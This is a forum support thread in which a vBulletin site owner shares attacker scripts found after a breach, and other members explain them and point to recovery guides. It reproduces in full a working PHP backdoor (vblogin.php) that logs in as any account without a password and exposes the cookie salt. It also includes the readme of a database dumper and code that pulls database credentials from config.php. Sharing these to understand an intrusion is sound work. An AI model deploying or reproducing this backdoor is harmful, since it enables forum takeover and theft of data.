vBulletin hack with vblogin.php

[Muhammad Rahman]

cek this post : https://theadminzone.com/threads/vbu...2/#post-932481

[Dave]

What is the question?

[Muhammad Rahman]

Quote:

Originally Posted by Dave

What is the question?

only share information ..
hacker dump database .. cek my post at the admin zone

[ozzy47]

Well the post is deleted or hidden there, so we know nothing.

[Muhammad Rahman]

ok ..
this script vblogin.php

PHP Code:

<?php

require_once('./global.php');
define('SELF', $_SERVER['PHP_SELF']);

function verify_authentication2($username)
{
    global $vbulletin;

    $username = strip_blank_ascii($username, ' ');
    $charset = strtolower(vB_Template_Runtime::fetchStyleVar('charset')) == 'iso-8859-1' ? 'windows-1252' : vB_Template_Runtime::fetchStyleVar('charset');
    $username = preg_replace(
        '/&#([0-9]+);/ie',
        "convert_unicode_char_to_charset('\\1', '$charset')",
        $username
    );

    if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
    {
        set_authentication_cookies($cookieuser);

        $return_value = true;
        ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
        return $return_value;
    }

    $return_value = false;
    ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
    return $return_value;
}

$guess = array();
$known = array(
    'archive',
    'clientscript',
    'cpstyles',
    'customavatars',
    'customgroupicons',
    'customprofilepics',
    'attach',
    'forumrunner',
    'images',
    'includes',
    'install',
    'packages',
    'signaturepics',
    'store_sitemap',
    'vb'
);
$admindir = $vbulletin->config['Misc']['admincpdir'];
$complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
$results = scandir('.');

foreach ($results as $result) {
    if ($result == '.' or $result == '..') continue;

    if (is_dir('./' . $result)) {
        if(in_array($result, $known)) continue;
        if(@file_exists($result . '/adminlog.php'))
        {
            $guess[] = $result;
        } else {
            continue;
        }
    }
}

if(isset($_GET['do']) && $_GET['do'] == 'login' && isset($_GET['username']))
{
    require_once(DIR . '/includes/functions_login.php');
    
    $username = $_GET['username'];
    $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
    $query = $vbulletin->db->query_first($q);
    if($query['username'] != null)
    {
        if(verify_authentication2($query['username']))
        {
            exec_unstrike_user($query['username']);
            
            process_new_login('cplogin', true, null);
            
            do_login_redirect();
        }
        else
        {
            die('Verify failed');
        }
    }
    else
    {
        die('User not found.');
    }
} else {
?>
<h1>vBulletin Login  | CP Login</h1>
<hr />
<form action="<?php echo SELF; ?>" method="get">
    <input type="hidden" name="do" value="login" />
    <input type="text" name="username" value="" />
    <input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $complete; ?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
<hr />
<p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
<p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
<p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
<hr />
<?php
}

?>

Code:

                      __---__
                   _-       _--______
              __--( /     \ )XXXXXXXXXXXXX_
            --XXX(   O   O  )XXXXXXXXXXXXXXX-
           /XXX(       U     )        XXXXXXX\
         /XXXXX(              )--_  XXXXXXXXXXX\
        /XXXXX/ (      O     )   XXXXXX   \XXXXX\
        XXXXX/   /            XXXXXX   \__ \XXXXX----
        XXXXXX__/          XXXXXX         \__----  -
---___  XXX__/          XXXXXX      \__         ---
  --  --__/   ___/\  XXXXXX            /  ___---=
    -_    ___/    XXXXXX              '--- XXXXXX
      --\/XXX\ XXXXXX                      /XXXXX
        \XXXXXXXXX                        /XXXXX/
         \XXXXXX                        _/XXXXX/
           \XXXXX--__/              __-- XXXX/
            --XXXXXXX---------------  XXXXX--
               \XXXXXXXXXXXXXXXXXXXXXXXX-
                 --XXXXXXXXXXXXXXXXXX-
           * * * * * who ya gonna call? * * * * *
		   
MySQL Dumper v2.1 Copyright ? 2013

How to use:
Unzip the file in a writeable directory.
Go to /msd/install.php
It may find vBulletin config information and fill the form out automatically. If not enter it manually.
Click install and enjoy.

This uses a staggered dump process to dump larger databases.
I have been able to dump a 2GB database just fine with this.
As far as my testing goes it should dump most DB's with ease.
There are a lot of variables that go into a server, therefore I can not gurantee your experience will be the same.
The script may timeout for you. I think that it should work well for the most part.
If you have any problems with it or suggestions you can Jabber me: plumm@jabber.org or find me at http://byteoverflow.net.

Some features:
Dump DB
Drop DB
View tables in DB
Dump single table
Drop table
Prune table (TRUNCATE)
Insert row into table
Explore inside of table
Delete row in table
Edit row in table
Search table
vBulletin hash dumper
Install script (install.php)
Will search for possible vB config files and fill the install form out automatically if found.

Please keep this text file in the folder and visit: http://byteoverflow.net.

Updates in 2.1:
Staggered compression for bigger DB's and tables. The script shouldn't time out now when compressing a larger DB. Compresses 50 MB of data at a time.
Edited CSS
Just edited a few other things.


I hope you all enjoy this tool, Plum

and this two attach msd.zip and msd1.zip

i hope someone can give explan how this script work..

[ozzy47]

Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

[Dave]

It's just a script which has some code copied from the real login.php file. After a successful login it redirect you to the admincp.

The second script is a database dumper.

[Muhammad Rahman]

Quote:

Originally Posted by ozzy47

Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

ok. thanks

Quote:

Originally Posted by Dave

It's just a script which has some code copied from the real login.php file. After a successful login it redirect you to the admincp.

The second script is a database dumper.

but how hacker can upload to server

[ozzy47]

Quote:

Originally Posted by Muhammad Rahman

but how hacker can upload to server

Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.

[Muhammad Rahman]

Quote:

Originally Posted by ozzy47

Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.

hacker try to find config.php

PHP Code:

$root_path = CleanDir($_SERVER['DOCUMENT_ROOT']);
$path1 = "$root_path/includes/config.php";
$path2 = "$root_path/forum/includes/config.php";
$path3 = "$root_path/forums/includes/config.php";
$path4 = "$root_path/foro/includes/config.php";
$path5 = "$root_path/foros/includes/config.php";
$path6 = "$root_path/board/includes/config.php";
$path7 = "$root_path/community/includes/config.php";
$path8 = "$root_path/vb/includes/config.php";
$path9 = "$root_path/vbulletin/includes/config.php";
if (file_exists($path1)) {
    include ($path1);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path2)) {
    include ($path2);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path3)) {
    include ($path3);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path4)) {
    include ($path4);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path5)) {
    include ($path5);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path6)) {
    include ($path6);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path7)) {
    include ($path7);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path8)) {
    include ($path8);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (file_exists($path9)) {
    include ($path9);
    $confighost = $config['MasterServer']['servername'];
    $configuser = $config['MasterServer']['username'];
    $configpassword = $config['MasterServer']['password'];
    $configport = $config['MasterServer']['port'];
    echo "<center><b><font color='green'>vB config information found!</font></b></center>";
} else {
    $confighost = "localhost";
    $configuser = "";
    $configpassword = "";
    $configport = "3306";
    echo "<center><b><font color='red'>No vB config information found!</font></b></center>";
} 


thanks for information